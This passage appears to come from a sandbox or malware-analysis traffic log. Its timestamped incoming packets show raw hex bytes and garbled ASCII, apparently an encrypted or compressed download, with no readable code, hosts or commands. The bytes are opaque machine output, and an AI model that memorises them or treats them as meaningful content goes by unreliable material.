7c 2c 6a 31 00 54 9b 61 f4 c2 dc d3 40 66 fc dd 53 eb d9 42 36 18 c4 8a ef a5 d1 67 7f 4c 4d 81 c1 8f ec ea 4d 96 a0 f2 07 ed 95 2c 2c d9 Data Ascii: _rmLJz/;Q}MM{2/Im=;\|~DY6(cWn}v2oOxk?oy-uMMyH"i8.?Wc!l(gB`Aa_he$_1%P#<VOCp{{O)2"}pE\|,j1Ta@fSB6gLMM,,
2021-12-01 18:25:38 UTC	34	IN	Data Raw: a7 9a 5f 0a be f8 36 5a aa 6a 05 05 0b b3 c0 46 92 84 f2 4c 47 3f 2b b2 19 e3 24 6f 98 52 ab 49 e4 8b eb 05 7c a6 98 7e 8a 88 2e 36 eb 28 8d 82 76 a6 28 ef b4 a7 93 21 f2 86 88 c3 9e d4 4b aa a6 07 40 97 b6 0f cd 21 e3 b4 3b 09 0b 0d c3 4d b8 95 34 8f e9 01 b6 33 91 80 58 44 7f 94 e4 98 d1 5b bd b3 80 e4 15 b5 7e 18 aa 1c 2b e1 94 b9 d9 4b 55 a9 07 a1 de 1d 09 89 36 0e c0 16 f9 54 1c 9e dd eb 67 a9 13 b1 88 77 c4 b9 8b 9d 7d 9f ae 0a e0 d9 93 44 40 1f 43 b0 2a a2 5a 33 3f 9a b9 d3 39 08 05 f7 b0 25 9b fd 24 ec 5c 76 ad 9e 73 8d 64 eb 03 7e a7 50 f5 90 3d 42 60 1d d0 1a 64 3b 84 b4 97 78 35 55 da 7d 09 4d e1 b6 cd c0 d2 40 37 d5 79 79 f9 24 88 a8 38 09 40 f9 e0 bb 38 e0 36 f0 b1 98 ce c0 e8 d6 5b 4e 9c b3 9b 82 20 5c a0 6d 51 a3 3a d4 5c d1 54 6f ba 6d 73 Data Ascii: _6ZjFLG?+$oRI\|~.6(v(!K@!;M43XD[~+KU6Tgw}D@C*Z3?9%$\vsd~P=B`d;x5U}M@7yy$8@86[N \mQ:\Toms
2021-12-01 18:25:38 UTC	35	IN	Data Raw: 75 52 a3 75 d7 b6 6e 81 de 45 7e cd 69 43 b4 04 14 ab cb 58 41 bf f1 6e 6e b3 f0 cd 5a f0 e4 59 56 15 3c 29 22 a3 fc 45 95 e2 bd e9 aa e4 bd 03 08 10 4c 4e 18 8b e3 3e 72 a2 47 fe 48 c8 bd 82 62 25 f5 d4 aa f8 bb 6a 6c bc 7a ee 87 dc 42 da 95 46 e0 6e 2c b8 e9 9c c1 76 a1 63 b3 5a 99 fc 6a 0e 1a 4a de 87 51 8d a8 3c 03 0b e7 6e e2 b3 37 c0 8e e1 47 7c f6 1f 6d 96 2b 9d c5 6d f1 cf c9 67 08 97 9d 29 d9 12 5d 63 63 f5 03 7c 8f 06 1a 34 92 61 9f 70 a2 f6 4a 07 5b 61 27 da ae cc b6 8b 42 7d fb 6f ea 2c 5b d6 1c dc 00 2b 1a a2 21 54 06 23 e9 d0 f6 85 eb 84 72 4b 8e 88 4d 6c 49 a1 a0 28 71 55 4a 4c d1 91 25 7c ea e2 58 40 97 63 ca 57 2c 0b f2 de 3f 0b 80 38 1c bc ae 8e 7b 9d 6f 25 56 da 2e 3e 61 9a 01 1b 90 50 64 ca 6b 70 08 4c d1 36 34 44 fd 0e 7a bb 31 ba c8 Data Ascii: uRunE~iCXAnnZYV<)"ELN>rGHb%jlzBFn,vcZjJQ<n7G\|m+mg)]cc\|4apJ[a'B}o,[+!T#rKMlI(qUJL%\|X@cW,?8{o%V.>aPdkpL64Dz1
2021-12-01 18:25:38 UTC	36	IN	Data Raw: 09 08 3b 2b 27 19 14 7a 3d ba b5 88 f8 cf 45 f0 f3 ea 40 ba 93 61 3c 0a 7e 92 a4 54 06 dc 2d 25 0a 0a 8e 56 b4 60 a1 3d 92 25 ea e3 76 1a d1 3b 1e 76 99 76 79 64 97 d4 ab 6d 6b 79 81 21 35 39 a4 07 0a 24 98 2a 21 c9 6d e4 16 cf 49 85 dc 57 78 ed 5b cd 02 d1 28 ac 30 23 c7 48 a8 26 14 fd 03 39 dd dc 67 a8 5d 30 b4 3a 71 17 ba d4 9e 3b 9a 81 20 84 01 b1 b6 f7 a6 6c 9c b5 55 5d 6a 61 7d 36 31 84 b2 79 09 db b4 76 53 33 c7 dc c7 9e 87 95 82 d3 06 2f ad 9b c8 63 03 cc 83 c7 99 51 7d 29 77 3f 44 99 43 9e 0d 0b 62 38 37 3b 28 52 9b 45 d7 60 e4 81 cc 36 17 64 43 de 7b dc 7d 21 a6 c9 25 1d f0 97 c3 f7 df 46 22 61 c4 80 7d 5a 9a 80 6c 80 e9 28 22 43 00 69 cd 29 cd 60 b5 0c 65 6f 30 db 84 1c e0 e5 05 08 c1 9a d1 16 fa 9d 58 ee 70 cc de 21 aa b3 51 7d 0c 08 c3 2a 0d Data Ascii: ;+'z=E@a<~T-%V`=%v;vvydmky!59$!mIWx[(0#H&9g]0:q; lU]ja}61yvS3/cQ})w?DCb87;(RE`6dC{}!%F"a}Zl("Ci)`eo0Xp!Q}
2021-12-01 18:25:38 UTC	38	IN	Data Raw: 1a c9 10 84 9a 9d e6 2e 5d a6 df c9 40 ac e8 aa 69 fe 55 42 97 03 31 b7 ec 28 d9 df af 8d 62 b9 ac a4 60 48 9a 28 9d 46 10 1b de a1 ef 99 57 9d 29 d6 15 a6 6a 11 d5 03 7c a6 7e e2 f3 e0 e2 61 e2 2b ba 4a 07 90 60 27 da ae dc b1 89 67 7d eb 7c 91 b7 44 38 18 a8 66 a8 f5 a1 2e e3 2a ac 6c d0 e0 1f 16 d3 22 1a ea 71 f3 93 23 da ae 7f 27 13 87 e2 e2 d0 cc 9e 82 e3 d5 b2 57 48 06 da c5 5f 0f 21 6e d8 38 d5 06 38 a9 ce 7b c2 7f 2d 7b 80 93 ee 61 8a 26 66 aa fc 98 e2 1d 9f 9b c9 be 42 8c 26 4c 8f 84 b1 31 c1 89 6b 6f 43 08 5f b6 24 8a 30 dd 6b 0e 36 81 b7 c3 96 73 b9 39 ba 1b a2 42 65 41 ff fd ed 39 87 f7 10 68 9c 1d d6 1a 6b b6 d2 c5 1c 8d 82 a2 92 34 81 e0 cf 04 a3 a8 a9 b5 97 6e 19 d5 3a 8e 8d 5c 63 69 cd c2 b7 14 ef 45 35 85 ba 5b d4 c7 ea 16 b1 fa 5c dc 48 Data Ascii: .]@iUB1(b`H(FW)j\|~a+J`'g}\|D8f.*l"q#'WH_!n88{-{a&fB&L1koC_$0k6s9BeA9hk4n:\ciE5[\H
2021-12-01 18:25:38 UTC	39	IN	Data Raw: 35 ab ac 1c c0 c2 bc 9a 64 eb 63 d6 bc 11 9d d6 f6 f5 35 e2 2d 03 96 7a 84 30 30 3d 4a 15 f2 56 94 b2 60 d1 b4 81 d2 18 4c 90 5d d1 9c 24 01 f5 08 a1 05 f9 75 ae b2 6f 62 38 4a 29 74 f7 69 12 a4 10 93 e2 73 92 ad df c5 23 9d 57 3e 20 af 9f bc 52 ba e6 ad 82 c5 bb 3b 7f b8 ca 40 b2 40 af 37 ec 9c e8 64 c8 3a 16 94 71 aa 08 e3 79 91 b5 14 93 16 4d 97 03 3c 07 0b b7 b6 7c 1a 6c 8f ea 7d a9 82 6c 85 c1 a4 fc 85 1c f2 80 1b 08 c3 2b 81 4e be 8f ff 6f de 82 2a bf 75 92 97 99 e9 58 e1 de f1 10 7d 0d d0 8b f7 17 da e5 0d 5e f7 de 19 91 00 d1 30 1d db c1 c7 ed a5 34 6f 02 38 2f fa ae ad ed c0 f7 90 4e 77 97 8d a4 3d 91 1c 2d 20 50 b3 55 72 8b 58 d4 46 fa 2b 8d 90 0f 7c 59 60 f5 f0 e3 50 c0 f9 ce c7 17 79 bd 20 13 4c eb c5 43 32 b7 9a e8 d1 0f 66 de a8 d5 e0 01 8a Data Ascii: 5dc5-z00=JV`L]$uob8J)tis#W> R;@@7d:qyM<\|l}l+No*uX}^04o8/Nw=- PUrXF+\|Y`Py LC2f
2021-12-01 18:25:38 UTC	40	IN	Data Raw: 49 57 d8 2d 34 d4 c1 5b 12 7e b7 8b d6 23 bc 0f 9e a3 6b a1 5a e7 d5 16 2b 65 89 67 5c 61 1b 6b 24 fb 73 1d a7 72 40 92 b6 cf b7 e1 f0 57 7a 80 e5 2c 98 4d d6 06 3e 61 71 f5 47 0c d1 70 ea f7 c5 17 16 a7 ed 8f 97 4a f6 36 e5 da b5 d9 70 4f 7a 51 ce 16 ba d5 c0 b3 f7 c6 45 27 7a ce ac e9 18 ea 3b d6 bf e5 54 30 87 c3 b4 85 91 ee 8e 61 f7 a5 38 d7 7c 5d 90 f4 5a 53 b3 39 bc 4c 3a 91 87 cc b4 4f fd 7e 1f 32 54 da 09 2d ee 5e ad 47 05 00 fa 83 4b fc 6d ec 32 b4 b0 64 9c a2 00 46 1e 3f 3b d7 f5 1f 79 07 44 ae 47 2b c9 08 66 5b b0 c3 a0 79 84 03 5c 37 b3 aa 88 9a 6d 86 5e f4 95 5d 8d 75 e5 32 0e 8e 73 9e 4e 36 6d c6 4c 33 58 a5 94 8e 33 8d 3e d9 03 7e 54 ed ac 43 3f b9 28 fa ac 5b 89 2c 91 bd c1 e1 58 04 90 7e 47 cc a0 c1 92 f8 0b 2d 1e fc dc 54 37 30 ad 95 f9 Data Ascii: IW-4[~#kZ+eg\ak$sr@Wz,M>aqGpJ6pOzQE'z;T0a8\|]ZS9L:O~2T-^GKm2dF?;yDG+f[y\7m^]u2sN6mL3X3>~TC?([,X~G-T70
2021-12-01 18:25:38 UTC	42	IN	Data Raw: 9a d2 9b a3 80 fd aa 39 e3 40 0c 4b cd 8c 14 62 83 02 24 e7 8e c0 51 10 b9 ef 94 eb d4 75 14 ce 8e 27 38 d0 73 37 45 53 17 70 ba 42 22 04 ef 01 19 a0 f8 79 1c 86 a6 15 85 be 74 e4 69 ca ac ff c1 df 84 29 57 75 bb 8e 66 16 65 21 ba d9 41 a0 c1 69 27 f7 df fe d1 c4 3e 62 21 c2 37 96 f5 27 96 dc 05 cb ed ad 3c d7 d7 22 00 d9 da 1c b9 42 bb 7e 4e 1f 90 02 1a 28 d3 91 bb a5 1b 8b 91 f2 68 85 2b b9 f4 6f ca 44 b3 d6 2d dc 4b c5 1c 56 55 1e e2 d3 e7 22 92 63 67 43 e3 be e7 f8 22 64 51 c9 c2 99 ab 23 f9 e0 29 f0 79 09 11 32 ba 2e b7 60 64 11 f0 e5 91 33 9a 95 98 60 1b 2a 85 d0 a4 4e 20 fd 8a ce 94 87 63 38 14 55 dd df 23 e1 38 df 0f f4 84 3b eb e8 a6 c0 c0 9d ea 30 dd 04 7c f5 cc 5c ad 81 a6 c3 aa 73 d5 0a 27 f4 87 18 56 c6 75 a0 7f 52 ef 53 9d 09 48 9a d6 e5 02 Data Ascii: 9@Kb$Qu'8s7ESpB"yti)Wufe!Ai'>b!7'<"B~N(h+oD-KVU"cgC"dQ#)y2.`d3`*N c8U#8;0\|\s'VuRSH
2021-12-01 18:25:38 UTC	43	IN	Data Raw: e3 b2 2a c5 9b b6 24 07 ce ae 17 0f a9 76 e9 4f ec 41 cd 0c 3b b6 f1 f7 05 be 76 93 e1 82 f8 7e 4d b8 27 17 0a 30 39 0c a0 c5 6e 64 ef d4 13 34 0c ad 25 f9 00 c2 8c 4a 1c b6 9b 1e 87 fc f7 c7 1c 6c ec 9d d8 ed 9f 45 35 87 1a d4 f7 bb ec 68 a2 86 33 a9 ad fa d4 61 7c ab 4e 9f 1a 48 3a b0 32 4b e5 00 c9 9f c7 59 b7 49 4b b5 ad f6 91 d7 f2 50 5c cd f9 bc c9 0f 33 5c 9a cf f0 96 23 be 45 7b ca 4b 37 a4 8c 56 7f 49 1b 0d 5f 6d 20 6f 49 3e cf d9 b7 00 89 56 e7 bf 01 e6 31 e8 de 13 5f ac e3 62 e9 33 fc 80 8e 2b 50 6b 65 3f 58 fa 0e 93 bf 0b 66 21 79 a5 eb c0 bf 99 03 d6 42 49 7d d9 90 4e da dd c1 79 18 b6 3b cb 95 d1 86 24 e9 a7 d4 ae 99 92 94 a1 8f dd 0d d6 50 57 f8 a9 fc 9e 7d 32 84 39 23 a9 e6 5b e9 51 a3 a3 18 af 09 df 26 52 57 21 f1 58 97 09 fd 47 e6 25 7e Data Ascii: *$vOA;v~M'09nd4%JlE5h3a\|NH:2KYIKP\3\#E{K7VI_m oI>V1_b3+Pke?Xf!yBI}Ny;$PW}29#[Q&RW!XG%~
2021-12-01 18:25:38 UTC	44	IN	Data Raw: a5 70 cb 4c 85 6d 6d 20 fb 69 88 07 5f c1 4a 25 18 90 0a d7 f7 2f fa da 0b 74 a7 44 eb 1f 1f 7c 8b 5b e8 08 e3 20 df 24 01 41 6e 18 95 2b 34 29 ae b0 6b f0 ac 12 83 27 ca 6a a9 aa b2 68 9a 0a 48 bd 20 15 f9 be ba 6a f4 8d 12 e4 8e 2b e2 c6 a0 3d 98 48 fd e8 b5 63 80 a7 8b a0 be 73 15 ec c2 e3 c6 4a 08 1d 04 b4 5c 3f 7c c1 95 7a de 8a ba 2d 0c fb 38 25 d1 dd df 2b a8 50 ad b5 f7 5f 6e e7 65 f6 d7 ec 74 7f cf 3c 49 84 15 8d a4 52 28 dc cf 20 37 6d 33 4f f4 1c 65 b2 a5 23 ae da 62 46 c4 cd 68 fc e9 a4 57 79 fc 19 07 3b 48 f3 45 56 3c 99 28 c9 6b a7 12 e8 38 ff bd 0a d8 7a 76 37 20 19 90 fe ab cb 79 9b 31 62 a9 9b 51 f8 af 42 5c 0c 72 2d 9f 82 f4 7a 19 94 a7 61 a3 de 6d 03 96 05 b4 c1 cf 66 6e d3 a0 20 50 65 b1 c9 08 54 b3 09 df a8 cd 48 a3 df 41 09 69 e2 69 Data Ascii: pLmm i_J%/tD\|[ $An+4)k'jhH j+=HcsJ\?\|z-8%+P_net<IR( 7m3Oe#bFhWy;HEV<(k8zv7 y1bQB\r-zamfn PeTHAii
2021-12-01 18:25:38 UTC	45	IN	Data Raw: 11 7c 61 82 87 38 51 1a a0 28 0f 48 74 1b 64 de 0a 35 6b 05 7e 47 13 5e f9 6d ca 71 90 f7 e0 f5 a3 9e 7b b9 94 41 ea 58 f7 17 34 37 c9 d1 8f a2 ec 0a be 24 3f cf d0 7f 27 5f 80 3b 2b e2 17 ef 00 ec 1e 42 a8 b6 e2 05 ff 61 b6 2d 1e b2 c7 7f 2e 46 16 28 8d 50 6b 1d 3f 7d f0 0e 93 bd 33 1a 20 df 1a 14 3f 62 b4 1f 5d 46 95 a7 1d 5d 4e a0 ab 5a 79 b7 b8 ba 4b 40 9c c4 71 04 b7 5b 51 ed 5c ac a1 8f 89 1a 59 b4 40 c4 7b 5a ea 58 96 e4 f3 9d db 54 14 4c 6f c0 df 59 00 7b c4 aa b6 ce e8 0e 2a 51 c4 d1 97 8d 32 16 2e bd ee 52 03 eb 1e 18 df d0 00 ca 25 e6 e8 48 7b 49 30 8b 2b da 2f b2 a0 24 b4 4f 21 db 75 f6 4c 0b 2c 9b bb ad 49 57 d8 1c 57 9a 99 82 c4 fc b2 ff 32 af 16 22 02 b5 3e 56 3a 59 9f 3d 9c b2 2a 41 40 e0 f2 77 b4 72 58 9d 95 4b 2d e8 0d 18 5c dd 21 85 01 Data Ascii: \|a8Q(Htd5k~G^mq{AX47$?'_;+Ba-.F(Pk?}3 ?b]F]NZyK@q[Q\Y@{ZXTLoY{Q2.R%H{I0+/$O!uL,IWW2">V:Y=A@wrXK-\!
2021-12-01 18:25:38 UTC	47	IN	Data Raw: 2e 05 ee cd 37 9c 95 cf f9 0e ee 9d da 8b 9a 85 67 b6 c2 24 78 2c 29 cb c9 be d9 31 fe 87 3c 54 d3 21 22 20 99 ba 84 52 4a 08 db 32 b8 38 7a 3f b4 42 34 30 b7 04 91 34 49 99 65 d7 59 14 aa 73 af b6 8f f4 97 18 07 2c dc a2 ee ee f8 d4 a3 e1 bd 62 a6 ae fd 75 44 29 82 92 2a cc 82 e7 19 4a 22 fa 58 42 ee f2 c3 ed 87 95 10 d6 b9 eb e6 e6 f2 fb 46 34 37 31 da 28 64 ae 2a 79 7d 11 84 9a 14 7a fa 4a f1 dd 57 33 f2 26 4f 92 55 75 66 88 80 cf eb 59 c3 d8 9e af 04 a6 37 1f 82 8d 84 9a a3 12 71 ee 0f a9 7c 64 9a d7 9d a0 91 e2 b0 74 0d f5 80 09 20 c5 64 40 e0 58 fd e6 94 b7 cc c4 42 88 24 b4 2d 22 35 70 da fe 15 6e 24 9d 5f 79 18 21 49 c4 1c 51 43 d0 d5 aa 66 64 1f e0 e9 3e ce 75 7b f2 85 eb 24 1e a2 28 99 36 ff 36 90 18 4b 41 e8 e2 58 74 da cd 76 a8 3a f9 a0 21 2a Data Ascii: .7g$x,)1<T!" RJ28z?B404IeYs,buD)J"XBF471(dy}zJW3&OUufY7q\|dt d@XB$-"5pn$_y!IQCfd>u{$(66KAXtv:!*
2021-12-01 18:25:38 UTC	48	IN	Data Raw: b3 f6 e8 d2 9a cf 26 e1 b9 9e 05 36 3c f3 04 40 e9 f1 b6 de 3d 04 85 8d 98 d8 49 14 4b 95 20 eb 7d 54 c5 d7 1d 79 8c 6e ae ae 99 f1 b6 52 c2 6d bc a2 91 74 77 b1 a5 98 b5 66 97 4d 62 06 e6 06 2d 5a e7 20 a6 50 7b 0c 96 a7 21 9f a1 2a 0c 00 96 a0 75 da 81 17 c7 c9 2c 89 d0 cb 18 06 dd 3d 7a 25 e6 63 b8 02 1c 88 b4 db a2 d5 74 80 e6 00 40 30 9e 58 f8 d3 e2 50 a4 cb 02 77 a5 d0 5b a8 ca 14 42 e1 cc 85 89 32 00 62 b9 a8 39 e9 61 61 a6 14 7a 7b 2a 97 8c 82 20 5f b3 25 5a d8 0e 32 3f 3b 09 5f 95 11 86 bc 2c 77 d5 2c 78 11 f9 e2 1f 18 5e 23 b5 8c d1 26 a2 6f ac 5b cc 5d 24 cb 0f 6d 2f 2d 39 d0 d1 80 48 b8 3d 55 07 37 20 93 82 ea 48 c4 80 8f 57 31 a3 cd 41 e3 ac 4e 69 10 f9 ba 30 9e 30 aa dc 0d a9 d1 57 6b d4 09 5d 87 0b 32 49 cd 02 5a fb 0e 17 70 82 cc a4 2f ef Data Ascii: &6<@=IK }TynRmtwfMb-Z P{!u,=z%ct@0XPw[B2b9aaz{ _%Z2?;_,w,x^#&o[]$m/-9H=U7 HW1ANi00Wk]2IZp/
2021-12-01 18:25:38 UTC	49	IN	Data Raw: 0b 05 93 da 15 14 8d 0b 48 60 a0 47 94 d3 4f 01 15 35 ed ed 9c fc c8 b5 a3 8e 07 0a 3a 46 5c f7 a6 d4 46 8c 58 a0 f6 c9 9a 89 fe c6 64 7d 61 fb 02 7a 4e 91 13 49 b2 d5 bf e9 54 f8 4f aa e3 47 85 de af 8d 6a 4a 93 c3 a1 84 f0 23 cb 93 65 06 c1 0e 60 5c 96 f5 21 57 d7 58 8a dc f4 80 82 24 7c 00 28 a2 e2 0b 6d 83 e1 ce 8a 52 30 a6 9b 2d 4a 2e 7e 2f fe fd ca 9f 31 d8 b3 15 cc 66 ea f4 cb 23 86 83 aa e0 b8 ff 61 a8 84 1a ba b8 b3 0c 84 29 1f a2 28 1b e2 19 3b f4 f9 8e c9 be b4 30 45 dd 58 8b dc cc c8 f0 5d 7e 88 86 44 12 38 da 04 76 f9 49 e4 b8 b1 55 7b b4 ff 0f 7c 45 fc 27 ca 03 69 9b 76 90 de 8e cc ff 0e f1 0f 55 a9 cb 1c 27 d2 a0 bb 3d 2d e2 bb 61 a9 f0 3e cb ad 01 68 f2 f7 0d 3b e5 85 4f 01 29 cb 6c 06 d6 7e a1 9b 61 1f 1e d3 a5 d1 de 12 41 2f 0c eb 41 53 Data Ascii: H`GO5:F\FXd}azNITOGjJ#e`\!WX$\|(mR0-J.~/1f#a)(;0EX]~D8vIU{\|E'ivU'=-a>h;O)l~aA/AS
2021-12-01 18:25:38 UTC	50	IN	Data Raw: bd 5f e5 ac 6e be 7a 34 a9 9f d3 40 28 9b c1 bc 67 18 01 3a a9 b5 be 40 7a 8b ab 6b f4 15 98 91 23 9b 72 70 3a 9f b4 5c b5 20 a4 86 18 c9 0e 49 01 78 cc a5 dd aa 1f a8 d2 64 34 ad 9d 83 a1 5e eb f8 0e 45 69 32 57 b5 77 70 67 76 7b 8d dc 96 59 7e 2f 4c d5 ca b0 81 7b e7 81 13 38 51 f0 84 10 53 b8 11 eb 16 fe 9f 3d 01 17 1e f7 ed 3b 41 46 4c 99 a1 3f 6b a7 cf 20 6d 27 60 ca 79 42 8a 47 55 19 e2 38 b7 17 cb 07 26 c6 76 3d f7 2a bb d9 9a 7c 72 2a 84 82 f4 74 ab 64 03 4b 97 64 6a de 32 b9 d4 48 b6 14 1c 47 f1 89 af 8d 6c 02 07 20 2f d4 72 90 e4 3a 11 e7 37 90 e0 1d cf ae d6 5d db a8 8a 37 57 7f 7d 24 3c 9c a8 ac 40 9e 9e 5e 79 ad c6 98 9f d8 51 60 ce 56 c2 cc 01 ea e5 59 6e 86 63 d1 6a 1a a8 77 c4 ca d0 58 64 e5 53 7a ec e9 d4 ff b7 de a2 5d 3d 2b d0 4a 46 79 Data Ascii: _nz4@(g:@zk#rp:\ Ixd4^Ei2Wwpgv{Y~/L{8QS=;AFL?k m'`yBGU8&v=\|rtdKdj2HGl /r:7]7W}$<@^yQ`VYncjwXdSz]=+JFy
2021-12-01 18:25:38 UTC	51	IN	Data Raw: 8f c2 04 a1 a1 d7 cc 17 55 48 2a 64 c0 fe bb 4b 4c 67 3f 09 d9 26 f1 52 5a 30 d1 e7 61 ba 75 25 cf 90 df c0 9c d1 10 2b 1f 1f 73 78 08 4e 00 4e 3e 86 c3 cb fd 83 ed d9 3d 81 30 3d 0e ad e5 f5 48 a7 09 92 90 09 5b dd 1b 9a a5 96 dc ae 84 95 9d 56 19 5b 54 5a 8f 08 23 a6 83 99 b1 4b ca 12 b0 d5 e9 40 28 17 75 d3 01 95 06 e0 50 b9 c7 15 e4 d0 54 e1 41 e3 b8 38 fc 44 91 f6 a7 a7 1e 32 f4 5e e8 f1 b8 b9 d3 39 2d f4 6a b7 68 52 74 f4 c4 02 b2 25 8f e4 46 29 e4 26 27 40 15 75 e6 8f a9 30 1d d0 26 64 3b 84 b4 9f 78 3c 54 e3 75 8c 4a 83 00 ed 91 b8 57 d4 9b ee 6c e1 55 c9 c0 b3 44 4c 70 8b 3e ae 6b 2d c7 f7 26 bb b7 40 bb d6 0c e7 d3 18 46 2c 20 b0 65 ae 3b 43 52 4d bb 9f c0 e5 33 aa a9 69 61 b0 a6 31 e4 6e 78 ba 87 cd c1 12 9c c3 83 2d 8c 30 fc ae 2c 42 51 39 e0 Data Ascii: UH*dKLg?&RZ0au%+sxNN>=0=H[V[TZ#K@(uPTA8D2^9-jhRt%F)&'@u0&d;x<TuJWlUDLp>k-&@F, e;CRM3ia1nx-0,BQ9
2021-12-01 18:25:38 UTC	52	IN	Data Raw: 3e 40 70 6a 18 56 96 92 65 f4 bd 40 21 88 4d ed 01 17 53 02 8a c9 d5 b1 9c 36 60 82 e5 c5 21 83 98 d5 05 95 ba 32 5d 86 95 aa 9e 3d 6c 21 2a cd 77 46 34 37 50 d0 82 e9 e9 40 a6 9a d6 c1 52 be 26 7d 0b 78 11 e4 b0 0f 32 50 d3 55 75 11 b9 7f c0 6f 4d af 5f df 9c 56 6c 02 03 f8 b3 7b ef dc 10 80 42 58 fa 95 b0 e2 e3 69 a2 93 22 5b 27 db a5 7f f7 a3 8e 71 10 93 a3 61 e4 15 c2 69 08 7f 94 67 8a c5 dc f6 00 91 a7 9e 23 6a ba 28 79 49 fb 58 40 48 e9 d1 2f 56 e5 e5 2f 6a 14 be d2 9a 7b 72 0d f3 ef 64 12 f5 c3 23 54 74 b9 d1 91 27 9a b9 6f 1d 0d d4 ce db da 80 50 7b 10 6f 0b 82 3e fb 20 20 70 84 1e e5 86 3d 1b 2e 1a 69 31 f2 54 45 97 c9 82 94 36 41 bc dd c2 56 3d be 5f 10 02 67 29 e5 54 b2 3d 75 29 ba db ff b7 1d 9d 00 00 1b 1e 08 97 e5 4c c8 37 1a 7b b2 9a 54 b5 Data Ascii: >@pjVe@!MS6`!2]=l!*wF47P@R&}x2PUuoM_Vl{BXi"['qaig#j(yIX@H/V/j{rd#Tt'oP{o> p=.i1TE6AV=_g)T=u)L7{T
2021-12-01 18:25:38 UTC	54	IN	Data Raw: b3 b4 df d2 74 9a 76 9d d3 9a 44 e1 12 9e ad 05 94 02 9b 81 ca c9 54 d3 b1 6b bf ff dc 54 be ca ae ee 8b 33 03 3b 82 c6 60 d6 0a f2 84 29 90 6c d8 6d bf 82 f4 77 d3 ca da fd 2c 60 77 db 40 57 7e 30 9b 44 fb 3a e9 7c 75 8c a5 a2 9f 69 89 82 20 92 fa ac 98 02 3c 54 f6 e2 4c fe 2c 4d 25 bd b8 e8 a2 fd a5 e8 88 24 05 8c 1c 21 b8 96 e0 44 91 4f ae 74 e5 e1 26 fe 77 ac 5b ca 54 08 bf 6a 70 4c 3a 66 39 c6 ef 61 0c 36 58 23 92 85 2d 00 c5 c8 6b f2 4e 36 29 1b d6 64 e4 bb 42 a4 cb 22 3a d7 8b 8e 55 dc 04 75 11 b0 99 67 d2 c0 2a 7e 05 3b 7f 96 a2 04 ce e8 02 a6 0c 32 86 16 0f 32 d6 34 35 6e 4d 20 1b 8d 23 18 0e 13 e5 fd 44 1a 9f ce 20 9f 8d 5b 61 d8 e9 8d aa ef d1 86 b4 6c 34 d8 7a 5a 2e 86 33 29 49 a2 6d 20 6e c5 55 ed 7b b5 c6 60 e8 aa 87 0a 4f ee 46 da 1c 6a ec Data Ascii: tvDTkT3;`)lmw,`w@W~0D:\|ui <TL,M%$!DOt&w[TjpL:f9a6X#-kN6)dB":Uug*~;2245nM #D [al4zZ.3)Im nU{`OFj
2021-12-01 18:25:38 UTC	55	IN	Data Raw: df af be 21 18 a9 f0 2a 46 9e 28 c8 4e 02 84 e4 ce b1 96 df 8d c1 02 68 a7 9d 3e 37 84 82 fa fa 88 11 63 9f 69 61 86 e1 ce 59 b3 2d db ae 08 a9 cb f7 04 fe 9e ad b5 f7 db 7d 10 fe 5e f9 0b b4 06 a3 94 21 6a 28 e0 94 e2 0f 3f 0e 11 02 79 8e 10 1f 49 2a 43 2c cc 6d 59 52 a4 f1 44 b7 58 06 4a bd fa 16 c5 01 dc 72 6a 88 eb ea 67 3f 8a 70 6e 91 53 e7 b8 7a 7e 81 b7 74 83 d4 61 78 36 35 7e c5 6a 76 90 8f 99 67 aa 0e 92 e8 b5 3e 76 a5 29 6a a3 ed 5f c4 0e bc 1d be 7b a7 a4 a4 fe b0 19 cf 0c 6c 1a 1b da 14 00 89 e1 e2 03 2b f7 10 80 c3 d3 a8 1b 5c 38 1e c6 6e 0c eb f5 1f cb 7e 6d f7 15 ca 8b f7 4a 68 e3 98 b7 56 71 72 4b 31 17 ec 32 67 8f 05 fa b8 4d c9 00 61 90 ea 16 b1 28 e9 af 8c 0d 7d f4 e3 2a 64 f6 2e f5 28 e7 ee 3a 91 b2 d6 12 35 e6 c3 46 4d 0b 5e 72 a7 93 Data Ascii: !F(Nh>7ciaY-}^!j(?yIC,mYRDXJrjg?pnSz~tax65~jvg>v)j_{l+\8n~mJhVqrK12gMa(}*d.(:5FM^r
2021-12-01 18:25:38 UTC	56	IN	Data Raw: d9 5a 61 d2 73 8c 56 e0 d1 ad 3f 2d 47 d0 d8 e5 91 4a 6b 88 c0 b3 44 b4 72 7a 53 eb 96 dc c7 4c 94 3a a3 f6 1d a4 41 9d da 94 06 b7 de c5 99 ef 2c 7f 20 8c 36 41 eb 31 a3 8b a1 0f 37 3b fa c2 1d bc 8e 41 0c 1b 13 a1 ee ee 04 d2 75 5d 9d fa 07 cd 1c cd 08 66 64 f6 d0 47 c3 6d 40 e5 ff b2 95 02 a5 7b 02 8c 6c 6e ef 3e a5 2f b8 7b 4a f4 34 4c 15 9d f6 24 18 f2 3f 4f 3e 8f 8c a4 b4 19 91 17 99 e9 b7 25 27 9c a5 79 15 e8 8b f7 17 ea 84 66 09 cf 64 76 dc 04 81 d8 81 b9 98 38 9f 82 c7 df d3 e2 20 88 68 2f be a5 fe a0 1e 1f 28 12 1a 28 6d 97 33 df 24 75 61 72 46 c9 d4 46 f4 8a 2b 0d 4e 29 5f c1 47 4f 8c f6 55 1e c7 a2 27 43 aa 1c d6 bc 6e 8c 47 bd 9c 9b 3c 9a b7 bc c1 af 65 79 e1 85 24 f8 06 a7 33 ee 06 f4 dc bd 8f a7 31 74 65 d5 15 2d bf 4b 5c 62 29 cb 78 7c 8e Data Ascii: ZasV?-GJkDrzSL:A, 6A17;Au]fdGm@{ln>/{J4L$?O>%'yfdv8 h/((m3$uarFF+N)_GOU'CnG<ey$31te-K\b)x\|
2021-12-01 18:25:38 UTC	58	IN	Data Raw: 1c 06 77 90 1c 81 25 61 97 a4 11 d6 42 74 a8 ad c0 64 9f 3f 05 23 da fb 44 81 70 84 10 64 5a 31 ae ba 7d 8a 6d 07 16 15 29 99 bf 87 40 6d d3 f8 34 dd cd 7f f1 6f 3e 41 80 89 99 8d cd 73 17 b6 24 8a ce a7 08 a0 3e bf bc 01 68 97 82 f8 d3 a0 55 bd 9a 11 04 21 90 2f 86 be 10 68 fc d3 a3 6f 21 5e f4 41 91 f3 8e 11 ae dc 06 a9 b9 11 a7 a0 7c 31 51 6e 16 53 da 34 8a f3 6e de f3 25 19 24 ef 45 47 41 29 b7 2a 06 40 62 d6 4c 28 56 88 05 43 fe 62 32 c7 3d f7 58 d7 d9 48 74 1b 5f 3d 0f 58 a7 48 49 bb 96 5d a4 af 16 fd d4 57 b0 1d 8f 9f c1 ba 94 a4 be 